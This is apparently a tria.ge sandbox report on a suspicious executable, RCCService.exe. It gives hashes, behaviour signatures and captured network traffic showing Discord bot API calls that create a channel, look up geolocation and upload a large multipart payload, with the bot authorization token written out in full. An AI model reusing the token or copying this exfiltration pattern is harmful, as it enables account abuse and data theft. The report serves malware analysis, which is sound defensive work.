Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

6

Static

static

3

RCCService.exe

windows10-2004-x64

Resubmissions

06/07/2024, 06:52 UTC

240706-hnee6azbjk 6

06/07/2024, 06:50 UTC

240706-hl8afssarg 6

06/07/2024, 06:43 UTC

240706-hgxm6ayhlq 6

Analysis

  • max time kernel
    33s
  • max time network
    43s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/07/2024, 06:50 UTC

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    RCCService.exe

  • Size

    5.2MB

  • MD5

    c4641e109dbc33cf7d30ff17548b6dc0

  • SHA1

    3c21a30dbc80e8fdceb413a41ceb2612ab134ddc

  • SHA256

    28a91c954c66714cda48b2ca4ce52459cdb191755f6825e02b00e430aaef67b9

  • SHA512

    b1ce2dc42829c379a0b50bcd69231b26996484cf8184351db023f759a48e952c531b427249cbedeb4a18cd9ffaa6504e8da2752b9f43fefd42028753cd6380ec

  • SSDEEP

    98304:oQ9rjjcAka3x9vgdHHSmnFFSaxhsHHF/81eNApeap+/SX/b1/GmOPL:PaAz3x9OjnFFSaxgHedtp+6xQPL

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RCCService.exe
    "C:\Users\Admin\AppData\Local\Temp\RCCService.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1636
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1940

Network

  • flag-us
    DNS
    gateway.discord.gg
    RCCService.exe
    Remote address:
    8.8.8.8:53
    Request
    gateway.discord.gg
    IN A
    Response
    gateway.discord.gg
    IN A
    162.159.134.234
    gateway.discord.gg
    IN A
    162.159.133.234
    gateway.discord.gg
    IN A
    162.159.136.234
    gateway.discord.gg
    IN A
    162.159.130.234
    gateway.discord.gg
    IN A
    162.159.135.234
  • flag-us
    GET
    https://gateway.discord.gg/?v=9&encording=json
    RCCService.exe
    Remote address:
    162.159.134.234:443
    Request
    GET /?v=9&encording=json HTTP/1.1
    Connection: Upgrade,Keep-Alive
    Upgrade: websocket
    Sec-WebSocket-Key: 9iuR9uN2jmYr4vX6EnQRGA==
    Sec-WebSocket-Version: 13
    Host: gateway.discord.gg
    Response
    HTTP/1.1 101 Switching Protocols
    Date: Sat, 06 Jul 2024 06:50:52 GMT
    Connection: upgrade
    sec-websocket-accept: oVx8Xq9c7B/UrElUpvNA9WhdwTg=
    upgrade: websocket
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IpJBN5w4Jf%2BOI87PREPRRSFLzAMzJMBDTs6Q6r4JAvp8z2zaiToWmQZ16n3SJdi6p1s4JojLBVRDiFw7d7xqe8PGNuBcdkcfdV0gBcmyKUkjl%2Bjjzy7m1ISqnetBAexBrQbsKA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    X-Content-Type-Options: nosniff
    Server: cloudflare
    CF-RAY: 89eda9be8d324145-LHR
  • flag-us
    DNS
    discord.com
    RCCService.exe
    Remote address:
    8.8.8.8:53
    Request
    discord.com
    IN A
    Response
    discord.com
    IN A
    162.159.135.232
    discord.com
    IN A
    162.159.137.232
    discord.com
    IN A
    162.159.128.233
    discord.com
    IN A
    162.159.138.232
    discord.com
    IN A
    162.159.136.232
  • flag-us
    DNS
    234.134.159.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    234.134.159.162.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    POST
    https://discord.com/api/v9/guilds/1259016982901293077/channels
    RCCService.exe
    Remote address:
    162.159.135.232:443
    Request
    POST /api/v9/guilds/1259016982901293077/channels HTTP/1.1
    authorization: Bot MTIzODk5NzI3ODYzMTM5NTM3OQ.Gk5TBP.Y2ep4XxcH3_q1QP3cLiLy6mEB-JTTpnepmYcgY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 29
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 201 Created
    Date: Sat, 06 Jul 2024 06:50:53 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=16baada03b6411efb1e08664cd328cb9; Expires=Thu, 05-Jul-2029 06:50:53 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: be56019ae011689ff5baf218062aacf5
    x-ratelimit-limit: 2000
    x-ratelimit-remaining: 1988
    x-ratelimit-reset: 1720330037.124
    x-ratelimit-reset-after: 81383.659
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AcacH4JbETdD50EJDSMwAEDvJNT3XClqXVl3%2FnCpRPFXn3avFmOw5kq78Lupp6EruyRqmRmsIjRtyPvouyxH7%2BB43VJUkS1Bg3G8NJMUvopDoMxFiTiLLd2cvNnC"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=16baada03b6411efb1e08664cd328cb94da520b9445e6628b02bbd87d4c37d1fcf47e32290d69c8a7c61ff5ed8f07c2e; Expires=Thu, 05-Jul-2029 06:50:53 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=09ab12165024d9fdf6ba09d033796fcbd4a720cc-1720248653; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=HAjFLNtxHHZtZhEbve272OcJ_KS1Uf1hAgOi5j5DdoA-1720248653633-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 89eda9c36cbf24f0-LHR
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.dual-a-0034.a-msedge.net
    g-bing-com.dual-a-0034.a-msedge.net
    IN CNAME
    dual-a-0034.a-msedge.net
    dual-a-0034.a-msedge.net
    IN A
    204.79.197.237
    dual-a-0034.a-msedge.net
    IN A
    13.107.21.237
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c9df8dd13dd54bb28a54b83db1783e26&localId=w:A722701F-1589-5EDD-8B83-701925E7ACC0&deviceId=6755471616861629&anid=
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c9df8dd13dd54bb28a54b83db1783e26&localId=w:A722701F-1589-5EDD-8B83-701925E7ACC0&deviceId=6755471616861629&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=347FE8D46F7F65440220FC606E9F6401; domain=.bing.com; expires=Thu, 31-Jul-2025 06:50:53 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 5D9EC84E2EEF4E70911FEA65AB68021A Ref B: LON04EDGE1206 Ref C: 2024-07-06T06:50:53Z
    date: Sat, 06 Jul 2024 06:50:52 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c9df8dd13dd54bb28a54b83db1783e26&localId=w:A722701F-1589-5EDD-8B83-701925E7ACC0&deviceId=6755471616861629&anid=
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c9df8dd13dd54bb28a54b83db1783e26&localId=w:A722701F-1589-5EDD-8B83-701925E7ACC0&deviceId=6755471616861629&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=347FE8D46F7F65440220FC606E9F6401
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=GYxG-thmemca6XrwdofpiWK09VvixpRNSpgmDkJ0bEM; domain=.bing.com; expires=Thu, 31-Jul-2025 06:50:53 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 06754B5E223241468D09B5525EDE8053 Ref B: LON04EDGE1206 Ref C: 2024-07-06T06:50:53Z
    date: Sat, 06 Jul 2024 06:50:52 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c9df8dd13dd54bb28a54b83db1783e26&localId=w:A722701F-1589-5EDD-8B83-701925E7ACC0&deviceId=6755471616861629&anid=
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c9df8dd13dd54bb28a54b83db1783e26&localId=w:A722701F-1589-5EDD-8B83-701925E7ACC0&deviceId=6755471616861629&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=347FE8D46F7F65440220FC606E9F6401; MSPTC=GYxG-thmemca6XrwdofpiWK09VvixpRNSpgmDkJ0bEM
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 5CBB4E8472804619B26787126A5A2BDA Ref B: LON04EDGE1206 Ref C: 2024-07-06T06:50:53Z
    date: Sat, 06 Jul 2024 06:50:52 GMT
  • flag-us
    DNS
    geolocation-db.com
    RCCService.exe
    Remote address:
    8.8.8.8:53
    Request
    geolocation-db.com
    IN A
    Response
    geolocation-db.com
    IN A
    159.89.102.253
  • flag-de
    GET
    https://geolocation-db.com/json
    RCCService.exe
    Remote address:
    159.89.102.253:443
    Request
    GET /json HTTP/1.1
    Host: geolocation-db.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sat, 06 Jul 2024 06:50:53 GMT
    Content-Type: text/html
    Content-Length: 194
    Location: https://geolocation-db.com/json/
    Connection: keep-alive
  • flag-de
    GET
    https://geolocation-db.com/json/
    RCCService.exe
    Remote address:
    159.89.102.253:443
    Request
    GET /json/ HTTP/1.1
    Host: geolocation-db.com
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sat, 06 Jul 2024 06:50:53 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Access-Control-Allow-Origin: *
  • flag-us
    POST
    https://discord.com/api/v9/channels/1259038849447759973/messages
    RCCService.exe
    Remote address:
    162.159.135.232:443
    Request
    POST /api/v9/channels/1259038849447759973/messages HTTP/1.1
    authorization: Bot MTIzODk5NzI3ODYzMTM5NTM3OQ.Gk5TBP.Y2ep4XxcH3_q1QP3cLiLy6mEB-JTTpnepmYcgY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 115
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Sat, 06 Jul 2024 06:50:54 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=172b1e143b6411ef9340be8a03617009; Expires=Thu, 05-Jul-2029 06:50:54 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1720248655.077
    x-ratelimit-reset-after: 1.000
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CJl%2FBk%2FZmDAtoAxSB%2FgW6B2P39eECPAMIsC8vnDdwf4jAtAUP0Srkq%2BiVyU8mai%2FWuEpFXCL6XIHGrRBQAKEHD0tWtfLZqxjsMpinOwCZSNY4D%2FO0x7hZG822Wd8"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=172b1e143b6411ef9340be8a03617009964174995584115c293f2aee963d29a0c76d720d22a286e4b6dcdc01d212961a; Expires=Thu, 05-Jul-2029 06:50:54 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=0cca46056a01f7a70c8e6d62d5f43293db29414f-1720248654; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=2T10yki4MSqR1d8o7n5OuVE286H3BEkABUfVDWSMH3I-1720248654370-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 89eda9c75814bd9a-LHR
  • flag-us
    DNS
    232.135.159.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.135.159.162.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    134.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    134.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    237.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    237.197.79.204.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    45.19.74.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    45.19.74.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    253.102.89.159.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    253.102.89.159.in-addr.arpa
    IN PTR
    Response
  • flag-us
    POST
    https://discord.com/api/v9/channels/1259038849447759973/messages
    RCCService.exe
    Remote address:
    162.159.135.232:443
    Request
    POST /api/v9/channels/1259038849447759973/messages HTTP/1.1
    authorization: Bot MTIzODk5NzI3ODYzMTM5NTM3OQ.Gk5TBP.Y2ep4XxcH3_q1QP3cLiLy6mEB-JTTpnepmYcgY
    Content-Type: multipart/form-data; boundary="2896fbfd-7abf-4eaa-b78e-e8fc47da8131"
    Host: discord.com
    Content-Length: 441096
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Sat, 06 Jul 2024 06:51:00 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=1aa18f063b6411efa47f8ea91c0139ed; Expires=Thu, 05-Jul-2029 06:51:00 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1720248660.844
    x-ratelimit-reset-after: 1.000
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7BlSsrHfvV3HFOUl0TbDoVEqUB0UDsx28q7OuysJFzF8guqzf6RZXfqu3vHVY0qfnx9LDhUs2BZECzv5kbLcosJpNVMToo8wLOoP43KhP4We7Xby14WwnZiRVkwb"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=1aa18f063b6411efa47f8ea91c0139ed89001f94b3e0ce028a2100bb699d405a4ee138ed7d84966604c29f542abcfcaf; Expires=Thu, 05-Jul-2029 06:51:00 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=62d818e3a7ab7be3fa6aaf97af17ac481f6d04fe-1720248660; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=s19tEi1c.0aG1cNTv8FXMbxhae3lKWlM7MpJ53gM9.M-1720248660179-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 89eda9e95bfc7738-LHR
  • flag-us
    POST
    https://discord.com/api/v9/channels/1259038849447759973/messages
    RCCService.exe
    Remote address:
    162.159.135.232:443
    Request
    POST /api/v9/channels/1259038849447759973/messages HTTP/1.1
    authorization: Bot MTIzODk5NzI3ODYzMTM5NTM3OQ.Gk5TBP.Y2ep4XxcH3_q1QP3cLiLy6mEB-JTTpnepmYcgY
    Content-Type: application/json; charset=utf-8
    Host: discord.com
    Content-Length: 31
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Date: Sat, 06 Jul 2024 06:51:00 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    set-cookie: __dcfduid=1ac89c0e3b6411efacbed63846657647; Expires=Thu, 05-Jul-2029 06:51:00 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 3
    x-ratelimit-reset: 1720248661.841
    x-ratelimit-reset-after: 1.484
    vary: Accept-Encoding
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XGkWUYkG9LNVT1lvnc7RxdblF85j9QbvioJ4FImOQtN%2FYraIhZPOiefwF8%2FU7UD34q9%2Fb6bp8sWGPj1E2eN%2F5eHXstRmcWbMYyC6ZYPGHs5XOY4bDw5alchbY9tm"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=1ac89c0e3b6411efacbed638466576470ced2c5caef201414caf0765606510b02725245d67ad494e72e142876337f77f; Expires=Thu, 05-Jul-2029 06:51:00 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=62d818e3a7ab7be3fa6aaf97af17ac481f6d04fe-1720248660; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=SuHYOgtSKlI6bEXtrgqCDKEkG4RG5AIYXbCpPUQSsgo-1720248660434-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 89eda9ee9c08940a-LHR
  • flag-us
    DNS
    86.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    86.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.31.95.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.31.95.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    147.142.123.92.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    147.142.123.92.in-addr.arpa
    IN PTR
    Response
    147.142.123.92.in-addr.arpa
    IN PTR
    a92-123-142-147deploystaticakamaitechnologiescom
  • 162.159.134.234:443
    https://gateway.discord.gg/?v=9&encording=json
    tls, http
    RCCService.exe
    1.8kB
     31.6kB
     24
    43

    HTTP Request

    GET https://gateway.discord.gg/?v=9&encording=json

    HTTP Response

    101
  • 162.159.135.232:443
    https://discord.com/api/v9/guilds/1259016982901293077/channels
    tls, http
    RCCService.exe
    1.1kB
     5.3kB
     11
    13

    HTTP Request

    POST https://discord.com/api/v9/guilds/1259016982901293077/channels

    HTTP Response

    201
  • 204.79.197.237:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c9df8dd13dd54bb28a54b83db1783e26&localId=w:A722701F-1589-5EDD-8B83-701925E7ACC0&deviceId=6755471616861629&anid=
    tls, http2
    2.0kB
     9.3kB
     22
    19

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c9df8dd13dd54bb28a54b83db1783e26&localId=w:A722701F-1589-5EDD-8B83-701925E7ACC0&deviceId=6755471616861629&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=c9df8dd13dd54bb28a54b83db1783e26&localId=w:A722701F-1589-5EDD-8B83-701925E7ACC0&deviceId=6755471616861629&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=c9df8dd13dd54bb28a54b83db1783e26&localId=w:A722701F-1589-5EDD-8B83-701925E7ACC0&deviceId=6755471616861629&anid=

    HTTP Response

    204
  • 159.89.102.253:443
    https://geolocation-db.com/json/
    tls, http
    RCCService.exe
    848 B
     4.5kB
     9
    10

    HTTP Request

    GET https://geolocation-db.com/json

    HTTP Response

    301

    HTTP Request

    GET https://geolocation-db.com/json/

    HTTP Response

    200
  • 162.159.135.232:443
    https://discord.com/api/v9/channels/1259038849447759973/messages
    tls, http
    RCCService.exe
    1.3kB
     3.0kB
     9
    11

    HTTP Request

    POST https://discord.com/api/v9/channels/1259038849447759973/messages

    HTTP Response

    200
  • 162.159.135.232:443
    https://discord.com/api/v9/channels/1259038849447759973/messages
    tls, http
    RCCService.exe
    466.3kB
     7.9kB
     350
    117

    HTTP Request

    POST https://discord.com/api/v9/channels/1259038849447759973/messages

    HTTP Response

    200
  • 162.159.135.232:443
    https://discord.com/api/v9/channels/1259038849447759973/messages
    tls, http
    RCCService.exe
    1.1kB
     2.8kB
     8
    9

    HTTP Request

    POST https://discord.com/api/v9/channels/1259038849447759973/messages

    HTTP Response

    200
  • 8.8.8.8:53
    gateway.discord.gg
    dns
    RCCService.exe
    64 B
     144 B
     1
    1

    DNS Request

    gateway.discord.gg

    DNS Response

    162.159.134.234
    162.159.133.234
    162.159.136.234
    162.159.130.234
    162.159.135.234

  • 8.8.8.8:53
    discord.com
    dns
    RCCService.exe
    57 B
     137 B
     1
    1

    DNS Request

    discord.com

    DNS Response

    162.159.135.232
    162.159.137.232
    162.159.128.233
    162.159.138.232
    162.159.136.232

  • 8.8.8.8:53
    234.134.159.162.in-addr.arpa
    dns
    74 B
     136 B
     1
    1

    DNS Request

    234.134.159.162.in-addr.arpa

  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
     90 B
     1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
     151 B
     1
    1

    DNS Request

    g.bing.com

    DNS Response

    204.79.197.237
    13.107.21.237

  • 8.8.8.8:53
    geolocation-db.com
    dns
    RCCService.exe
    64 B
     80 B
     1
    1

    DNS Request

    geolocation-db.com

    DNS Response

    159.89.102.253

  • 8.8.8.8:53
    232.135.159.162.in-addr.arpa
    dns
    74 B
     136 B
     1
    1

    DNS Request

    232.135.159.162.in-addr.arpa

  • 8.8.8.8:53
    134.32.126.40.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    134.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
     128 B
     1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    237.197.79.204.in-addr.arpa
    dns
    73 B
     143 B
     1
    1

    DNS Request

    237.197.79.204.in-addr.arpa

  • 8.8.8.8:53
    45.19.74.20.in-addr.arpa
    dns
    70 B
     156 B
     1
    1

    DNS Request

    45.19.74.20.in-addr.arpa

  • 8.8.8.8:53
    253.102.89.159.in-addr.arpa
    dns
    73 B
     140 B
     1
    1

    DNS Request

    253.102.89.159.in-addr.arpa

  • 8.8.8.8:53
    86.23.85.13.in-addr.arpa
    dns
    70 B
     144 B
     1
    1

    DNS Request

    86.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    18.31.95.13.in-addr.arpa
    dns
    70 B
     144 B
     1
    1

    DNS Request

    18.31.95.13.in-addr.arpa

  • 8.8.8.8:53
    147.142.123.92.in-addr.arpa
    dns
    73 B
     139 B
     1
    1

    DNS Request

    147.142.123.92.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1636-0-0x00007FFE82F23000-0x00007FFE82F25000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1636-1-0x0000014D7A430000-0x0000014D7A970000-memory.dmp

    Filesize

    5.2MB

    Download

  • memory/1636-2-0x0000014D7D130000-0x0000014D7D2F2000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/1636-3-0x00007FFE82F20000-0x00007FFE839E1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1636-4-0x0000014D7D970000-0x0000014D7DE98000-memory.dmp

    Filesize

    5.2MB

    Download

  • memory/1636-19-0x00007FFE82F20000-0x00007FFE839E1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1636-18-0x00007FFE82F23000-0x00007FFE82F25000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1940-11-0x000001D0577B0000-0x000001D0577B1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1940-7-0x000001D0577B0000-0x000001D0577B1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1940-17-0x000001D0577B0000-0x000001D0577B1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1940-12-0x000001D0577B0000-0x000001D0577B1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1940-16-0x000001D0577B0000-0x000001D0577B1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1940-15-0x000001D0577B0000-0x000001D0577B1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1940-14-0x000001D0577B0000-0x000001D0577B1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1940-13-0x000001D0577B0000-0x000001D0577B1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1940-6-0x000001D0577B0000-0x000001D0577B1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1940-5-0x000001D0577B0000-0x000001D0577B1000-memory.dmp

    Filesize

    4KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.